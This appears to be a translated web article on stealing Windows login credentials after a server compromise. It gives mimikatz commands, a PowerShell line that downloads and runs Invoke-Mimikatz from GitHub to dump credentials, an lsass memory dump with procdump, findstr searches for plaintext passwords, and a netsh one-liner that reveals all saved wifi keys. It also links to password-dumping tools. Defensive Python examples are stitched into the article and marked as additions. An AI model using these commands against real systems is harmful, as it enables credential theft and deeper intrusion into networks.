What are the techniques for stealing login credentials under Windows

2025-02-24 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)05/31

Many newcomers are unclear about the techniques used to steal login credentials on Windows. This article explains them in detail for readers who need to understand them.

After gaining privileges on a Windows server, an attacker collects login credentials of every kind in order to extend the compromise. The following are several tools and techniques for stealing Windows login credentials.

1. Windows local password hashes

By default, a Windows system password hash consists of two parts: the first is the LM hash and the second is the NTLM hash. On Windows, a password hash entry has the format username:RID:LM-HASH:NT-HASH.

For example:

Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040

User name: Administrator
RID: 500
LM hash value: AF01DF70036EBACFAAD3B435B51404EE
NT hash value: 44F077E27F6FEF69E7BD834C7242B040
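The entry format above can be checked from the defender's side. The following is an added example, not part of the original article: it parses a username:RID:LM-HASH:NT-HASH line and reports hardening findings. The function names are this example's own, and the empty-password hash constants are well-known values.

```python
from dataclasses import dataclass

# Well-known constants: LM and NT hashes of an empty password, and the LM
# half produced when one 7-character half of the password is empty.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"
EMPTY_LM_HALF = EMPTY_LM[:16]

@dataclass
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

def parse_line(line: str) -> HashEntry:
    """Parse 'user:RID:LM:NT'; trailing fields such as ':::' are ignored."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("expected user:RID:LM:NT")
    user, rid, lm, nt = parts[0], parts[1], parts[2].upper(), parts[3].upper()
    for name, value in (("LM", lm), ("NT", nt)):
        if len(value) != 32 or set(value) - set("0123456789ABCDEF"):
            raise ValueError(f"{name} hash must be 32 hex characters")
    return HashEntry(user, int(rid), lm, nt)

def audit(entry: HashEntry) -> list[str]:
    """Return hardening findings for one account (hypothetical helper)."""
    findings = []
    if entry.rid == 500:
        findings.append("RID 500: built-in Administrator account")
    if entry.lm != EMPTY_LM:
        findings.append("LM hash stored: enable the NoLMHash policy and reset the password")
        if entry.lm[16:] == EMPTY_LM_HALF:
            findings.append("second LM half is empty: password is 7 characters or fewer")
    if entry.nt == EMPTY_NT:
        findings.append("NT hash of an empty password: account has no password set")
    return findings

if __name__ == "__main__":
    # The sample line is the one shown in the article.
    sample = "Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040"
    for finding in audit(parse_line(sample)):
        print(finding)
```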

Cracking method 1: online hash-cracking websites

https://www.objectif-securite.ch/ophcrack
http://cmd5.com

Cracking method 2: mimikatz

GitHub address:

https://github.com/gentilkiwi/mimikatz

Mimikatz is also very easy to use: it takes only two commands to extract the plaintext passwords of the Windows system:

privilege::debug
sekurlsa::logonpasswords

Cracking method 3: wce

The common parameters of wce are as follows:

-l lists logon sessions and NTLM credentials (default)
-s changes the NTLM credentials of the current logon session
-w obtains the cleartext passwords cached by digest authentication

Cracking method 4: PowerShell+mimikatz

Use PowerShell directly to call mimikatz and grab the plaintext passwords in the system.

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Cracking method 5: procdump+mimikatz

Procdump is a small tool officially provided by Microsoft. Microsoft's official download address is:

https://technet.microsoft.com/en-us/sysinternals/dd996900

# Copy the tool to the target machine and execute the following command (administrator permission is required, and the version I chose is 64-bit)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Copy the generated memory dump file to the same directory as mimikatz and double-click to open mimikatz:
mimikatz # sekurlsa::minidump lsass.dmp
# Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
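The command lines in methods 2, 4 and 5 are distinctive enough to detect in process-creation telemetry. The following is an added example, not part of the original article: it matches those command lines against a small rule set. The rule names, host names and sample events are constructed, and commands typed inside an interactive mimikatz console do not appear in process-creation records.

```python
import re

# Rules keyed to the command lines shown above; the rule names are this
# example's own. The lsass rule ignores the binary name because procdump
# can be renamed; it does not catch a dump requested by PID.
RULES = {
    "lsass_memory_dump": re.compile(
        r"(?=.*\s[-/]m[amp]\b)(?=.*\blsass\b)", re.I),
    "mimikatz_module_command": re.compile(
        r"\b(?:privilege|sekurlsa)::\w+", re.I),
    "powershell_download_and_execute": re.compile(
        r"(?=.*\b(?:IEX|Invoke-Expression)\b)(?=.*\bDownloadString\b)", re.I),
    "invoke_mimikatz": re.compile(r"\bInvoke-Mimikatz\b", re.I),
}

def match_rules(command_line: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    normalized = " ".join(command_line.split())  # collapse odd spacing
    return [name for name, rx in RULES.items() if rx.search(normalized)]

def detect(events: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Return (host, image, rule names) for each event with a hit."""
    hits = []
    for event in events:
        rules = match_rules(event.get("CommandLine", ""))
        if rules:
            hits.append((event["Computer"], event["Image"], rules))
    return hits

# Constructed sample events (not real logs), shaped like process-creation
# records such as Sysmon Event ID 1 or Security Event ID 4688.
SAMPLE_EVENTS = [
    {"Computer": "SRV01", "Image": r"C:\Temp\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"Computer": "SRV01", "Image": r"C:\Temp\mimikatz.exe",
     "CommandLine": "mimikatz.exe privilege::debug sekurlsa::logonpasswords"},
    {"Computer": "WS07", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \"IEX (New-Object Net.WebClient).DownloadString("
                    "'https://example.invalid/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\""},
    {"Computer": "WS07", "Image": r"C:\Tools\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma notepad.exe notepad.dmp"},  # benign
]

if __name__ == "__main__":
    for host, image, rules in detect(SAMPLE_EVENTS):
        print(host, image, ", ".join(rules))
```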

2. Grab browser passwords

Many browsers can remember passwords, and users often choose to save them when logging in to websites.

LaZagne: extracts the passwords saved by the browser

GitHub project address:

https://github.com/AlessandroZ/LaZagne

3. Passwords stored in plaintext on the server

Some configuration files and logs record sensitive password information in plaintext, for example web.config, config.ini and similar files. Sensitive directories can be searched manually, or sensitive files and their contents can be found with the findstr command.

findstr /i /s "password" *.config
findstr /i /s "password" *.ini
findstr /i /s "password" *.xml
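The same search can be run as an audit that finds plaintext passwords for remediation without copying them into the report. The following is an added example, not part of the original article: it walks a directory for the same three file types and returns each hit with the value masked. The function names and the redaction pattern are this example's own.

```python
import fnmatch
import os
import re

PATTERNS = ("*.config", "*.ini", "*.xml")  # same file types as the findstr commands
# Matches password=value, password: value and <password>value;
# group 1 is the key part that is safe to report, group 2 the secret.
SECRET = re.compile(r"(?i)(password[\"']?\s*[=:>]\s*[\"']?)([^\"';<]+)")

def redact(line: str) -> str:
    """Mask secret values; withhold the line if its layout is not recognised."""
    redacted, count = SECRET.subn(r"\1***", line.strip())
    return redacted if count else "[line withheld: contains 'password']"

def scan(root: str) -> list[tuple[str, int, str]]:
    """Return (relative path, line number, redacted line) for each hit."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not any(fnmatch.fnmatch(name.lower(), p) for p in PATTERNS):
                continue
            path = os.path.join(folder, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    for number, line in enumerate(handle, 1):
                        if "password" in line.lower():
                            findings.append(
                                (os.path.relpath(path, root), number, redact(line)))
            except OSError:
                continue  # unreadable file: skip rather than abort the audit
    return sorted(findings)

if __name__ == "__main__":
    for path, number, text in scan("."):
        print(f"{path}:{number}: {text}")
```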

4. Decrypting passwords saved by third-party operations and maintenance tools

Commonly used tools include Linux operations and maintenance clients such as PuTTY, Xshell and WinSCP; RDP management tools such as Remote Desktop Organizer; and remote control software such as TeamViewer.

Xshell password decryption tool:

https://github.com/dzxs/Xdecrypt

Extract session information saved by WinSCP, PuTTY, etc.:

https://github.com/Arvanaghi/SessionGopher

Tool for extracting TeamViewer passwords from memory:

https://github.com/attackercan/teamviewer-dumper

Reveal a client's asterisk-masked password with one click: asterisk password viewer.

5. Get the computer's wifi passwords with one click

# View all wifi profiles the computer has connected to
netsh wlan show profiles

# View the wifi password
netsh wlan show profiles name="Aaron" key=clear

# CMD one-liner to get all connected wifi passwords
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

6. Windows keyboard recording tool

Keyloggers record the user's keystrokes to capture sensitive information. Source code and tools of this type can be found on both GitHub and T00ls.

7. Collection of Windows password extraction tools

Password extraction tools for various Windows programs, including various browsers, mailboxes, Windows network passwords, wireless network keys, etc.

IE browser password extraction tool:

https://www.nirsoft.net/toolsdownload/iepv.zip

Firefox browser password extraction tool:

https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip

Chrome browser password extraction tool:

https://www.nirsoft.net/toolsdownload/chromepass.zip

SVN password decryptor:

http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip

Mailbox password extraction tool:

https://www.nirsoft.net/toolsdownload/mailpv.zip

Extract the password stored in the .rdp file:

https://www.nirsoft.net/toolsdownload/rdpv.zip

MSSQL credential password acquisition tool:

http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip
